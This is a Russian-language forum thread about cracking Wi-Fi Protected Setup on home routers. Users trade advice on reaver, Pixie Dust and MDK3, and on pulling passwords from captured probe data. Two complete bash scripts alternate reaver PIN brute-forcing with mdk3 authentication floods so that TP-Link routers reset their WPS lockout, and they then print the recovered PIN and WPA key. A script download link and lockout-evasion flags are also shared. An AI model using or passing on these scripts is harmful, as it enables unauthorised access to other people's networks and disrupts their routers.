Уязвимость в протоколе Wi-Fi Protected Setup

та просто таким образом можно было бы исключить блокировку wps при переборе,т.е роутер не смог бы что либо заподозрить,если не отправлять пакет М4 и тем самым не будет лока wps(но это в теории)

 

Да там все просто... Открываешь сохраненный *.csv и в колонке Probed ESSIDs смотришь... среди названий точек попадают и пароли...но это редкость

 

После MDK3 не такая уже и редкость.
Особенно недалекие люди начинают с матюками вводить многократно пароли и названия точки и в итоге результат.

 

Ну да, MDK3 делает хорошую дискотеку в эфире, хендшейки летят... Но мне кажется что пароли проходят через подключения со смартфонов... хотя хз...

 

так а как понять,что это именно пароли?а пин кода wps там не попадается?

 

mdk3 с какими именно параметрами?там же опций много....mdk3 на деаут клиентов что ли?

 

та если бы не хендшейки летели,а пароли в открытом виде или пины wps,то цены не было бы

 

Подскажите, как разблокировать WPS у роутера TL-WR841 без сброса к заводским настройкам? WPS заблокировался после попыток подбора PIN-кода. Перезагрузка роутера не помогает.

 

Зайти в админку роутера и включить WPS
http://www.tp-linkru.com/faq-87.html
Руководство:
http://static.tp-link.com/res/down/doc/TL-WR841ND_V11_UG.pdf
ПУНКТ 4.4 WPS
И учитесь пользоваться поиском!

 

Снял галочку напротив Отключить PIN-код маршрутизатора и WPS заработал. Выходит, после атаки автоматически включается эта настройка.

 

Точнее, после нескольких неверных попыток, да.

 

Лучше всего кувалдой, но если таковой не имеется, и монтировка сойдёт.

И предвещая негодование от моего ответа, подскажу, что эти предоставленные названия ничего не говорят, нужно больше данных.

 

Ривер с пикси. Также у длинков очень часто используют статичный или легко вычисляемый пароль.

 

напишите названия моделей этих роутеров. больше будет вариантов подсказок

 

Использую скрипт от VladimirV.
Есть проблема, reaver не останавливается после десятой попытки (ключ -g 10), а продолжает пытаться подбирать пин дальше:
[+] p1_index set to 160
[+] Pin count advanced: 160. Max pin attempts: 10
[+] 2000.00% complete. Elapsed time: 0d0h2m6s.
[+] Estimated Remaining time: 0d0h2m6s

Из-за этого не может запуститься mdk3.
Кто с таким сталкивался, как это победить?

 

У меня тоже не работает, связано с версией reaver. Сейчас поищу, я вроде переписывал скрипт по времени, а не по количеству попыток.

Spoiler: code

Code:

#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ...
do
gnome-terminal --title='reaver' -e "reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -s /etc/reaver/10FEED5AXXXX.wpc";
sleep 60;
killall reaver;

# Run mdk3 to work 3s
echo
echo
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;

как-то так.

 

Спасибо, VladimirV за помощь. Было пару трудностей. Может кому-то понадобиться.

• killall -s INT -w reaver - добавил эти два ключа, иначе буксует на месте, не сохраняет последний пин перед закрытием reaver.
• reaver -a - ключ убирает запрос: продолжить предыдущую сессию.
• "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX -m"; -m без этого ключа у меня, TP-Link не сбрасывал счетчик 10 неудачных попыток.
  

 

Эти команды в терминале вводить надо? Или скрипт куда то помещать надо?

 

Нашел переделанный скрипт, проверю, выложу.

 

Сам скрипт - http://rgho.st/6fbpBdPRn
Для быстрой и удачной работы нужен хороший сигнал.
В качестве параметра передается BSSID (12:34:56:78:90:AB) TpLink.sh 12:34:56:78:90:AB
Принцип работы:
1: Запускает reaver
2: Ждет ассоциации с точкой
3: Брутит пины 40 сек
4: Запуск Mdk3 на 6 сек
5 :Пауза 5 сек
6: Если пин не найден - повторяет с 1 по 6
7: Выводит пин и пас и ждет нажатия 'Ctrl+C'

Все файлы сохраняются в папке 'tmp' с файлом скрипта.BSSID в имени файла.

Spoiler: sh

Code:

#!/bin/bash

BSSID=$1
WPSPIN=""
WPAPSK=""
Work_reaver=20                #Время работы reaver * 2
tmp_path=`dirname $0`/tmp/$BSSID
echo $tmp_path
echo "BSSID = $BSSID"
if [ "$1" == "" ]
    then
    echo "No BSSID"
    exit 1
    fi
#echo "" > "$tmp_path.txt"


trap 'echo "Wait exit reaver"; kill_reaver; exit 1' 2

kill_reaver (){
killall -s INT -w reaver;
}

run_MDK3 (){
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a $BSSID -m"
sleep 6                            #Время работы Mdk3
killall mdk3 2> /dev/null
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]
sleep 5
}

wait_associated (){
Ass=""
while [ "$Ass" == "" ]
do
sleep 2
Ass=`grep "Associated with" "$tmp_path.txt"`
  if [ "$Ass" == "" ]
  then echo [-] not associated
  else echo $Ass
  fi
done

}

while [ "$WPSPIN" == "" ]
do
echo [+] reaver is working ...
echo "" > $tmp_path.txt
reaver -i mon0 -b $BSSID -n -v -L -s "$tmp_path.wpc" > "$tmp_path.txt" &
ReaverID=$!
disown $ReaverID

wait_associated

for (( counter=1; counter<$Work_reaver; counter++ ))
    do
     sleep 2
    if [ "$WPSPIN" == "" ]
        then
     WPSPIN=`grep "WPS PIN" "$tmp_path.txt"`
     WPAPSK=`grep "WPA PSK" "$tmp_path.txt"`
    else break
    fi
    done

TRYPIN=`grep "Trying pin" "$tmp_path.txt" | grep -oE "[[:digit:]]{8}"`

echo "Pins"
echo "$TRYPIN"

kill_reaver

# Run mdk3 to work ...
if [ "$WPSPIN" == "" ]
then run_MDK3
fi
done

echo "[+] Done..."
echo "$WPSPIN"
echo "$WPAPSK"
echo to interrupt script [Ctrl+C]
while true
do
sleep 3
done